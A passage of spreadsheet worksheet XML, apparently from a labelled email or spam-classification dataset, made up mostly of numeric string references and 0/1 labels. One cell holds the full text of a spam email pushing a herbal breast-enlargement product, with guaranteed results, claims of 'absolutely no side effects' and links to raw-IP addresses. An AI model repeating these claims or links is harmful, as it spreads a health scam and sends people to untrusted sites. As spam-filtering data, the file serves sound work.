      <c r="A8218" s="1">
        <v>8216.0</v>
      </c>
      <c r="B8218" s="1" t="s">
        <v>78</v>
      </c>
      <c r="C8218" s="1" t="s">
        <v>9760</v>
      </c>
      <c r="D8218" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8219">
      <c r="A8219" s="1">
        <v>8217.0</v>
      </c>
      <c r="B8219" s="1" t="s">
        <v>673</v>
      </c>
      <c r="C8219" s="3" t="str">
        <f>================================
 Guaranteed to increase, lift and firm your
 breasts in 60 days or your money back!!
 100% herbal and natural.  Proven formula since 
 1996.  Increase  your bust by 1 to 3 sizes within 30-60 
 days and be all natural.  
 Click here:
 http://202.101.163.34:81/li/wangxd/
 Absolutely no side effects!
 Be more self confident!
 Be more comfortable in bed!
 No more need for a lift or support bra!
 100% GUARANTEED AND FROM A NAME YOU KNOW AND 
 TRUST!
 **************************************************
 You are receiving this email as a double opt-in 
 subscriber to the Standard Affiliates Mailing 
 List. 
 To remove yourself from all related email lists,
 just click here:
 http://64.123.160.91:81/li/gg/unsubscriber.asp?userid=ilug@linux.ie
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</f>
        <v>#ERROR!</v>
      </c>
      <c r="D8219" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8220" hidden="1">
      <c r="A8220" s="1">
        <v>8218.0</v>
      </c>
      <c r="B8220" s="1" t="s">
        <v>130</v>
      </c>
      <c r="C8220" s="1" t="s">
        <v>9761</v>
      </c>
      <c r="D8220" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8221" hidden="1">
      <c r="A8221" s="1">
        <v>8219.0</v>
      </c>
      <c r="B8221" s="1" t="s">
        <v>204</v>
      </c>
      <c r="C8221" s="1" t="s">
        <v>9579</v>
      </c>
      <c r="D8221" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8222" hidden="1">
      <c r="A8222" s="1">
        <v>8220.0</v>
      </c>
      <c r="B8222" s="1" t="s">
        <v>4477</v>
      </c>
      <c r="C8222" s="1" t="s">
        <v>9762</v>
      </c>
      <c r="D8222" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8223">
      <c r="A8223" s="1">
        <v>8221.0</v>
      </c>
      <c r="B8223" s="1" t="s">
        <v>5524</v>
      </c>
      <c r="C8223" s="1" t="s">
        <v>9763</v>
      </c>
      <c r="D8223" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8224">
      <c r="A8224" s="1">
        <v>8222.0</v>
      </c>
      <c r="B8224" s="1" t="s">
        <v>5246</v>
      </c>
      <c r="C8224" s="1" t="s">
        <v>5247</v>
      </c>
      <c r="D8224" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8225" hidden="1">
      <c r="A8225" s="1">
        <v>8223.0</v>
      </c>
      <c r="B8225" s="1" t="s">
        <v>2020</v>
      </c>
      <c r="C8225" s="1" t="s">
        <v>2021</v>
      </c>
      <c r="D8225" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8226" hidden="1">
      <c r="A8226" s="1">
        <v>8224.0</v>
      </c>
      <c r="B8226" s="1" t="s">
        <v>1027</v>
      </c>
      <c r="C8226" s="1" t="s">
        <v>5499</v>
      </c>
      <c r="D8226" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8227">
      <c r="A8227" s="1">
        <v>8225.0</v>
      </c>
      <c r="B8227" s="1" t="s">
        <v>9764</v>
      </c>
      <c r="C8227" s="1" t="s">
        <v>9765</v>
      </c>
      <c r="D8227" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8228">
      <c r="A8228" s="1">
        <v>8226.0</v>
      </c>
      <c r="B8228" s="1" t="s">
        <v>9766</v>
      </c>
      <c r="C8228" s="1" t="s">
        <v>9736</v>
      </c>
      <c r="D8228" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8229" hidden="1">
      <c r="A8229" s="1">
        <v>8227.0</v>
      </c>
      <c r="B8229" s="1" t="s">
        <v>8755</v>
      </c>
      <c r="C8229" s="1" t="s">
        <v>8756</v>
      </c>
      <c r="D8229" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8230" hidden="1">
      <c r="A8230" s="1">
        <v>8228.0</v>
      </c>
      <c r="B8230" s="1" t="s">
        <v>551</v>
      </c>
      <c r="C8230" s="1" t="s">
        <v>552</v>
      </c>
      <c r="D8230" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8231">
      <c r="A8231" s="1">
        <v>8229.0</v>
      </c>
      <c r="B8231" s="1" t="s">
        <v>9767</v>
      </c>
      <c r="C8231" s="1" t="s">
        <v>9768</v>
      </c>
      <c r="D8231" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8232" hidden="1">
      <c r="A8232" s="1">
        <v>8230.0</v>
      </c>
      <c r="B8232" s="1" t="s">
        <v>8474</v>
      </c>
      <c r="C8232" s="1" t="s">
        <v>8475</v>
      </c>
      <c r="D8232" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8233">
      <c r="A8233" s="1">
        <v>8231.0</v>
      </c>
      <c r="B8233" s="1" t="s">
        <v>9769</v>
      </c>
      <c r="C8233" s="1" t="s">
        <v>9770</v>
      </c>
      <c r="D8233" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8234" hidden="1">
      <c r="A8234" s="1">
        <v>8232.0</v>
      </c>
      <c r="B8234" s="1" t="s">
        <v>189</v>
      </c>
      <c r="C8234" s="1" t="s">
        <v>190</v>
      </c>
      <c r="D8234" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8235" hidden="1">
      <c r="A8235" s="1">
        <v>8233.0</v>
      </c>
      <c r="B8235" s="1" t="s">
        <v>3489</v>
      </c>
      <c r="C8235" s="1" t="s">
        <v>9771</v>
      </c>
      <c r="D8235" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8236" hidden="1">
      <c r="A8236" s="1">
        <v>8234.0</v>
      </c>
      <c r="B8236" s="1" t="s">
        <v>9772</v>
      </c>
      <c r="C8236" s="1" t="s">
        <v>9773</v>
      </c>
      <c r="D8236" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8237">
      <c r="A8237" s="1">
        <v>8235.0</v>
      </c>
      <c r="B8237" s="1" t="s">
        <v>9774</v>
      </c>
      <c r="C8237" s="1" t="s">
        <v>9775</v>
      </c>
      <c r="D8237" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8238" hidden="1">
      <c r="A8238" s="1">
        <v>8236.0</v>
      </c>
      <c r="B8238" s="1" t="s">
        <v>6791</v>
      </c>
      <c r="C8238" s="1" t="s">
        <v>6792</v>
      </c>
      <c r="D8238" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8239" hidden="1">
      <c r="A8239" s="1">
        <v>8237.0</v>
      </c>
      <c r="B8239" s="1" t="s">
        <v>9195</v>
      </c>
      <c r="C8239" s="1" t="s">
        <v>9196</v>
      </c>
      <c r="D8239" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8240" hidden="1">
      <c r="A8240" s="1">
        <v>8238.0</v>
      </c>
      <c r="B8240" s="1" t="s">
        <v>6890</v>
      </c>
      <c r="C8240" s="1" t="s">
        <v>8312</v>
      </c>
      <c r="D8240" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8241">
      <c r="A8241" s="1">
        <v>8239.0</v>
      </c>
      <c r="B8241" s="1" t="s">
        <v>9776</v>
      </c>
      <c r="C8241" s="1" t="s">
        <v>9777</v>
      </c>
      <c r="D8241" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8242">
      <c r="A8242" s="1">
        <v>8240.0</v>
      </c>
      <c r="B8242" s="1" t="s">
        <v>9778</v>
      </c>
      <c r="C8242" s="1" t="s">
        <v>9779</v>
      </c>
      <c r="D8242" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8243" hidden="1">
      <c r="A8243" s="1">
        <v>8241.0</v>
      </c>
      <c r="B8243" s="1" t="s">
        <v>418</v>
      </c>
      <c r="C8243" s="1" t="s">
        <v>3530</v>
      </c>
      <c r="D8243" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8244" hidden="1">
      <c r="A8244" s="1">
        <v>8242.0</v>
      </c>
      <c r="B8244" s="1" t="s">
        <v>9780</v>
      </c>
      <c r="C8244" s="1" t="s">
        <v>9781</v>
      </c>
      <c r="D8244" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8245" hidden="1">
      <c r="A8245" s="1">
        <v>8243.0</v>
      </c>
      <c r="B8245" s="1" t="s">
        <v>9782</v>
      </c>
      <c r="C8245" s="1" t="s">
        <v>9783</v>
      </c>
      <c r="D8245" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8246" hidden="1">
      <c r="A8246" s="1">
        <v>8244.0</v>
      </c>
      <c r="B8246" s="1" t="s">
        <v>9784</v>
      </c>
      <c r="C8246" s="1" t="s">
        <v>9785</v>
      </c>
      <c r="D8246" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8247" hidden="1">
      <c r="A8247" s="1">
        <v>8245.0</v>
      </c>
      <c r="B8247" s="1" t="s">
        <v>486</v>
      </c>
      <c r="C8247" s="1" t="s">
        <v>9316</v>
      </c>
      <c r="D8247" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8248" hidden="1">
      <c r="A8248" s="1">
        <v>8246.0</v>
      </c>
      <c r="B8248" s="1" t="s">
        <v>803</v>
      </c>
      <c r="D8248" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8249" hidden="1">
      <c r="A8249" s="1">
        <v>8247.0</v>
      </c>
      <c r="B8249" s="1" t="s">
        <v>95</v>
      </c>
      <c r="C8249" s="1" t="s">
        <v>7432</v>
      </c>
      <c r="D8249" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8250" hidden="1">
      <c r="A8250" s="1">
        <v>8248.0</v>
      </c>
      <c r="B8250" s="1" t="s">
        <v>1717</v>
      </c>
      <c r="C8250" s="1" t="s">
        <v>9786</v>
      </c>
      <c r="D8250" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8251" hidden="1">
      <c r="A8251" s="1">
        <v>8249.0</v>
      </c>
      <c r="B8251" s="1" t="s">
        <v>2475</v>
      </c>
      <c r="C8251" s="1" t="s">
        <v>8544</v>
      </c>
      <c r="D8251" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8252">
      <c r="A8252" s="1">
        <v>8250.0</v>
      </c>
      <c r="B8252" s="1" t="s">
        <v>9787</v>
      </c>
      <c r="C8252" s="1" t="s">
        <v>9788</v>
      </c>
      <c r="D8252" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8253" hidden="1">
      <c r="A8253" s="1">
        <v>8251.0</v>
      </c>
      <c r="B8253" s="1" t="s">
        <v>4110</v>
      </c>
      <c r="C8253" s="1" t="s">
        <v>9789</v>
      </c>
      <c r="D8253" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8254" hidden="1">
      <c r="A8254" s="1">
        <v>8252.0</v>
      </c>
      <c r="B8254" s="1" t="s">
        <v>2886</v>
      </c>
      <c r="C8254" s="1" t="s">
        <v>7056</v>
      </c>
      <c r="D8254" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8255" hidden="1">
      <c r="A8255" s="1">
        <v>8253.0</v>
      </c>
      <c r="B8255" s="1" t="s">
        <v>7668</v>
      </c>
      <c r="C8255" s="1" t="s">
        <v>9387</v>
      </c>
      <c r="D8255" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8256">
      <c r="A8256" s="1">
        <v>8254.0</v>
      </c>
      <c r="B8256" s="1" t="s">
        <v>8238</v>
      </c>
      <c r="C8256" s="1" t="s">
        <v>8239</v>
      </c>
      <c r="D8256" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8257">
      <c r="A8257" s="1">
        <v>8255.0</v>
      </c>
      <c r="B8257" s="1" t="s">
        <v>9790</v>
      </c>
      <c r="C8257" s="1" t="s">
        <v>9791</v>
      </c>
      <c r="D8257" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8258" hidden="1">
      <c r="A8258" s="1">
        <v>8256.0</v>
      </c>
      <c r="B8258" s="1" t="s">
        <v>8446</v>
      </c>
      <c r="C8258" s="1" t="s">
        <v>9792</v>
      </c>
      <c r="D8258" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8259">
      <c r="A8259" s="1">
        <v>8257.0</v>
      </c>
      <c r="B8259" s="1" t="s">
        <v>9793</v>
      </c>
      <c r="C8259" s="1" t="s">
        <v>9794</v>
      </c>
      <c r="D8259" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8260">
      <c r="A8260" s="1">
        <v>8258.0</v>
      </c>
      <c r="B8260" s="1" t="s">
        <v>3270</v>
      </c>
      <c r="C8260" s="1" t="s">
        <v>3271</v>
      </c>
      <c r="D8260" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8261">
      <c r="A8261" s="1">
        <v>8259.0</v>
      </c>
      <c r="B8261" s="1" t="s">
        <v>9140</v>
      </c>
      <c r="C8261" s="1" t="s">
        <v>9141</v>
      </c>
      <c r="D8261" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8262" hidden="1">
      <c r="A8262" s="1">
        <v>8260.0</v>
      </c>
      <c r="B8262" s="1" t="s">
        <v>418</v>
      </c>
      <c r="C8262" s="1" t="s">
        <v>9795</v>
      </c>
      <c r="D8262" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8263" hidden="1">
      <c r="A8263" s="1">
        <v>8261.0</v>
      </c>
      <c r="B8263" s="1" t="s">
        <v>4523</v>
      </c>
      <c r="C8263" s="1" t="s">
        <v>9796</v>
      </c>
      <c r="D8263" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8264" hidden="1">
      <c r="A8264" s="1">
        <v>8262.0</v>
      </c>
      <c r="B8264" s="1" t="s">
        <v>4152</v>
      </c>
      <c r="C8264" s="1" t="s">
        <v>4153</v>
      </c>
      <c r="D8264" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8265" hidden="1">
      <c r="A8265" s="1">
        <v>8263.0</v>
      </c>
      <c r="B8265" s="1" t="s">
        <v>2154</v>
      </c>
      <c r="C8265" s="1" t="s">
        <v>2155</v>
      </c>
      <c r="D8265" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8266" hidden="1">
      <c r="A8266" s="1">
        <v>8264.0</v>
      </c>
      <c r="B8266" s="1" t="s">
        <v>7270</v>
      </c>
      <c r="C8266" s="1" t="s">
        <v>7271</v>
      </c>
      <c r="D8266" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8267" hidden="1">
      <c r="A8267" s="1">
        <v>8265.0</v>
      </c>
      <c r="B8267" s="1" t="s">
        <v>1159</v>
      </c>
      <c r="C8267" s="1" t="s">
        <v>9797</v>
      </c>
      <c r="D8267" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8268">
      <c r="A8268" s="1">
        <v>8266.0</v>
      </c>
      <c r="B8268" s="1" t="s">
        <v>9798</v>
      </c>
      <c r="C8268" s="1" t="s">
        <v>9799</v>
      </c>
      <c r="D8268" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8269">
      <c r="A8269" s="1">
        <v>8267.0</v>
      </c>
      <c r="B8269" s="1" t="s">
        <v>9800</v>
      </c>
      <c r="C8269" s="1" t="s">
        <v>9801</v>
      </c>
      <c r="D8269" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8270">
      <c r="A8270" s="1">
        <v>8268.0</v>
      </c>
      <c r="B8270" s="1" t="s">
        <v>9802</v>
      </c>
      <c r="D8270" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8271" hidden="1">
      <c r="A8271" s="1">
        <v>8269.0</v>
      </c>
      <c r="B8271" s="1" t="s">
        <v>6983</v>
      </c>
      <c r="C8271" s="1" t="s">
        <v>6984</v>
      </c>
      <c r="D8271" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8272" hidden="1">
      <c r="A8272" s="1">
        <v>8270.0</v>
      </c>
      <c r="B8272" s="1" t="s">
        <v>1092</v>
      </c>
      <c r="C8272" s="1" t="s">
        <v>1093</v>
      </c>
      <c r="D8272" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8273">
      <c r="A8273" s="1">
        <v>8271.0</v>
      </c>
      <c r="B8273" s="1" t="s">
        <v>9803</v>
      </c>
      <c r="C8273" s="1" t="s">
        <v>9804</v>
      </c>
      <c r="D8273" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8274" hidden="1">
      <c r="A8274" s="1">
        <v>8272.0</v>
      </c>
      <c r="B8274" s="1" t="s">
        <v>406</v>
      </c>
      <c r="C8274" s="1" t="s">
        <v>3334</v>
      </c>
      <c r="D8274" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8275" hidden="1">
      <c r="A8275" s="1">
        <v>8273.0</v>
      </c>
      <c r="B8275" s="1" t="s">
        <v>9805</v>
      </c>
      <c r="C8275" s="1" t="s">
        <v>9806</v>
      </c>
      <c r="D8275" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8276" hidden="1">
      <c r="A8276" s="1">
        <v>8274.0</v>
      </c>
      <c r="B8276" s="1" t="s">
        <v>2395</v>
      </c>
      <c r="C8276" s="1" t="s">
        <v>9807</v>
      </c>
      <c r="D8276" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8277" hidden="1">
      <c r="A8277" s="1">
        <v>8275.0</v>
      </c>
      <c r="B8277" s="1" t="s">
        <v>9808</v>
      </c>
      <c r="C8277" s="1" t="s">
        <v>9809</v>
      </c>
      <c r="D8277" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8278" hidden="1">
      <c r="A8278" s="1">
        <v>8276.0</v>
      </c>
      <c r="B8278" s="1" t="s">
        <v>582</v>
      </c>
      <c r="C8278" s="1" t="s">
        <v>4636</v>
      </c>
      <c r="D8278" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8279">
      <c r="A8279" s="1">
        <v>8277.0</v>
      </c>
      <c r="B8279" s="1" t="s">
        <v>4911</v>
      </c>
      <c r="C8279" s="1" t="s">
        <v>4912</v>
      </c>
      <c r="D8279" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8280" hidden="1">
      <c r="A8280" s="1">
        <v>8278.0</v>
      </c>
      <c r="B8280" s="1" t="s">
        <v>64</v>
      </c>
      <c r="C8280" s="1" t="s">
        <v>1772</v>
      </c>
      <c r="D8280" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8281">
      <c r="A8281" s="1">
        <v>8279.0</v>
      </c>
      <c r="B8281" s="1" t="s">
        <v>9810</v>
      </c>
      <c r="C8281" s="1" t="s">
        <v>9811</v>
      </c>
      <c r="D8281" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8282">
      <c r="A8282" s="1">
        <v>8280.0</v>
      </c>
      <c r="B8282" s="1" t="s">
        <v>74</v>
      </c>
      <c r="C8282" s="1" t="s">
        <v>9812</v>
      </c>
      <c r="D8282" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8283" hidden="1">
      <c r="A8283" s="1">
        <v>8281.0</v>
      </c>
      <c r="B8283" s="1" t="s">
        <v>5974</v>
      </c>
      <c r="C8283" s="1" t="s">
        <v>5975</v>
      </c>
      <c r="D8283" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8284" hidden="1">
      <c r="A8284" s="1">
        <v>8282.0</v>
      </c>
      <c r="B8284" s="1" t="s">
        <v>97</v>
      </c>
      <c r="C8284" s="1" t="s">
        <v>9813</v>
      </c>
      <c r="D8284" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8285" hidden="1">
      <c r="A8285" s="1">
        <v>8283.0</v>
      </c>
      <c r="B8285" s="1" t="s">
        <v>497</v>
      </c>
      <c r="C8285" s="1" t="s">
        <v>2184</v>
      </c>
      <c r="D8285" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8286" hidden="1">
      <c r="A8286" s="1">
        <v>8284.0</v>
      </c>
      <c r="B8286" s="1" t="s">
        <v>4342</v>
      </c>
      <c r="C8286" s="1" t="s">
        <v>4343</v>
      </c>
      <c r="D8286" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8287" hidden="1">
      <c r="A8287" s="1">
        <v>8285.0</v>
      </c>
      <c r="B8287" s="1" t="s">
        <v>259</v>
      </c>
      <c r="C8287" s="1" t="s">
        <v>8038</v>
      </c>
      <c r="D8287" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8288">
      <c r="A8288" s="1">
        <v>8286.0</v>
      </c>
      <c r="B8288" s="1" t="s">
        <v>7810</v>
      </c>
      <c r="C8288" s="1" t="s">
        <v>7811</v>
      </c>
      <c r="D8288" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8289" hidden="1">
      <c r="A8289" s="1">
        <v>8287.0</v>
      </c>
      <c r="B8289" s="1" t="s">
        <v>5601</v>
      </c>
      <c r="C8289" s="1" t="s">
        <v>9733</v>
      </c>
      <c r="D8289" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8290" hidden="1">
      <c r="A8290" s="1">
        <v>8288.0</v>
      </c>
      <c r="B8290" s="1" t="s">
        <v>7331</v>
      </c>
      <c r="C8290" s="1" t="s">
        <v>7332</v>
      </c>
      <c r="D8290" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8291">
      <c r="A8291" s="1">
        <v>8289.0</v>
      </c>
      <c r="B8291" s="1" t="s">
        <v>9814</v>
      </c>
      <c r="C8291" s="1" t="s">
        <v>9815</v>
      </c>
      <c r="D8291" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8292" hidden="1">
      <c r="A8292" s="1">
        <v>8290.0</v>
      </c>
      <c r="B8292" s="1" t="s">
        <v>9816</v>
      </c>
      <c r="C8292" s="1" t="s">
        <v>9817</v>
      </c>
      <c r="D8292" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8293">
      <c r="A8293" s="1">
        <v>8291.0</v>
      </c>
      <c r="B8293" s="1" t="s">
        <v>9492</v>
      </c>
      <c r="C8293" s="1" t="s">
        <v>9493</v>
      </c>
      <c r="D8293" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8294" hidden="1">
      <c r="A8294" s="1">
        <v>8292.0</v>
      </c>
      <c r="B8294" s="1" t="s">
        <v>6720</v>
      </c>
      <c r="C8294" s="1" t="s">
        <v>6721</v>
      </c>
      <c r="D8294" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8295">
      <c r="A8295" s="1">
        <v>8293.0</v>
      </c>
      <c r="B8295" s="1" t="s">
        <v>9818</v>
      </c>
      <c r="C8295" s="1" t="s">
        <v>9819</v>
      </c>
      <c r="D8295" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8296">
      <c r="A8296" s="1">
        <v>8294.0</v>
      </c>
      <c r="B8296" s="1" t="s">
        <v>9820</v>
      </c>
      <c r="C8296" s="1" t="s">
        <v>9821</v>
      </c>
      <c r="D8296" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8297" hidden="1">
      <c r="A8297" s="1">
        <v>8295.0</v>
      </c>
      <c r="B8297" s="1" t="s">
        <v>914</v>
      </c>
      <c r="C8297" s="1" t="s">
        <v>7020</v>
      </c>
      <c r="D8297" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8298">
      <c r="A8298" s="1">
        <v>8296.0</v>
      </c>
      <c r="B8298" s="1" t="s">
        <v>8161</v>
      </c>
      <c r="C8298" s="1" t="s">
        <v>9822</v>
      </c>
      <c r="D8298" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8299" hidden="1">
      <c r="A8299" s="1">
        <v>8297.0</v>
      </c>
      <c r="B8299" s="1" t="s">
        <v>2902</v>
      </c>
      <c r="C8299" s="1" t="s">
        <v>9672</v>
      </c>
      <c r="D8299" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8300">
      <c r="A8300" s="1">
        <v>8298.0</v>
      </c>
      <c r="B8300" s="1" t="s">
        <v>9823</v>
      </c>
      <c r="C8300" s="1" t="s">
        <v>9824</v>
      </c>
      <c r="D8300" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8301" hidden="1">
      <c r="A8301" s="1">
        <v>8299.0</v>
      </c>
      <c r="B8301" s="1" t="s">
        <v>9825</v>
      </c>
      <c r="C8301" s="1" t="s">
        <v>9826</v>
      </c>
      <c r="D8301" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8302" hidden="1">
      <c r="A8302" s="1">
        <v>8300.0</v>
      </c>
      <c r="B8302" s="1" t="s">
        <v>9827</v>
      </c>
      <c r="C8302" s="1" t="s">
        <v>9828</v>
      </c>
      <c r="D8302" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8303" hidden="1">
      <c r="A8303" s="1">
        <v>8301.0</v>
      </c>
      <c r="B8303" s="1" t="s">
        <v>7716</v>
      </c>
      <c r="C8303" s="1" t="s">
        <v>7717</v>
      </c>
      <c r="D8303" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8304" hidden="1">
      <c r="A8304" s="1">
        <v>8302.0</v>
      </c>
      <c r="B8304" s="1" t="s">
        <v>2304</v>
      </c>
      <c r="C8304" s="1" t="s">
        <v>9743</v>
      </c>
      <c r="D8304" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8305">
      <c r="A8305" s="1">
        <v>8303.0</v>
      </c>
      <c r="B8305" s="1" t="s">
        <v>4954</v>
      </c>
      <c r="C8305" s="1" t="s">
        <v>4142</v>
      </c>
      <c r="D8305" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8306" hidden="1">
      <c r="A8306" s="1">
        <v>8304.0</v>
      </c>
      <c r="B8306" s="1" t="s">
        <v>1516</v>
      </c>
      <c r="C8306" s="1" t="s">
        <v>9829</v>
      </c>
      <c r="D8306" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8307">
      <c r="A8307" s="1">
        <v>8305.0</v>
      </c>
      <c r="B8307" s="1" t="s">
        <v>9830</v>
      </c>
      <c r="C8307" s="1" t="s">
        <v>9831</v>
      </c>
      <c r="D8307" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8308" hidden="1">
      <c r="A8308" s="1">
        <v>8306.0</v>
      </c>
      <c r="B8308" s="1" t="s">
        <v>1423</v>
      </c>
      <c r="C8308" s="1" t="s">
        <v>7335</v>
      </c>
      <c r="D8308" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8309" hidden="1">
      <c r="A8309" s="1">
        <v>8307.0</v>
      </c>
      <c r="B8309" s="1" t="s">
        <v>6470</v>
      </c>
      <c r="C8309" s="1" t="s">
        <v>6471</v>
      </c>
      <c r="D8309" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8310" hidden="1">
      <c r="A8310" s="1">
        <v>8308.0</v>
      </c>
      <c r="B8310" s="1" t="s">
        <v>9832</v>
      </c>
      <c r="C8310" s="1" t="s">
        <v>9833</v>
      </c>
      <c r="D8310" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8311" hidden="1">
      <c r="A8311" s="1">
        <v>8309.0</v>
      </c>
      <c r="B8311" s="1" t="s">
        <v>383</v>
      </c>
      <c r="C8311" s="1" t="s">
        <v>9834</v>
      </c>
      <c r="D8311" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8312" hidden="1">
      <c r="A8312" s="1">
        <v>8310.0</v>
      </c>
      <c r="B8312" s="1" t="s">
        <v>9835</v>
      </c>
      <c r="C8312" s="1" t="s">
        <v>9836</v>
      </c>
      <c r="D8312" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8313" hidden="1">
      <c r="A8313" s="1">
        <v>8311.0</v>
      </c>
      <c r="B8313" s="1" t="s">
        <v>7707</v>
      </c>
      <c r="C8313" s="1" t="s">
        <v>7708</v>
      </c>
      <c r="D8313" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8314">
      <c r="A8314" s="1">
        <v>8312.0</v>
      </c>
      <c r="B8314" s="1" t="s">
        <v>8221</v>
      </c>
      <c r="C8314" s="1" t="s">
        <v>8222</v>
      </c>
      <c r="D8314" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8315" hidden="1">
      <c r="A8315" s="1">
        <v>8313.0</v>
      </c>
      <c r="B8315" s="1" t="s">
        <v>1846</v>
      </c>
      <c r="C8315" s="1" t="s">
        <v>9837</v>
      </c>
      <c r="D8315" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8316" hidden="1">
      <c r="A8316" s="1">
        <v>8314.0</v>
      </c>
      <c r="B8316" s="1" t="s">
        <v>9838</v>
      </c>
      <c r="C8316" s="1" t="s">
        <v>9839</v>
      </c>
      <c r="D8316" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8317" hidden="1">
      <c r="A8317" s="1">
        <v>8315.0</v>
      </c>
      <c r="B8317" s="1" t="s">
        <v>6380</v>
      </c>
      <c r="C8317" s="1" t="s">
        <v>6381</v>
      </c>
      <c r="D8317" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8318">
      <c r="A8318" s="1">
        <v>8316.0</v>
      </c>
      <c r="B8318" s="1" t="s">
        <v>9840</v>
      </c>
      <c r="C8318" s="1" t="s">
        <v>9841</v>
      </c>
      <c r="D8318" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8319">
      <c r="A8319" s="1">
        <v>8317.0</v>
      </c>
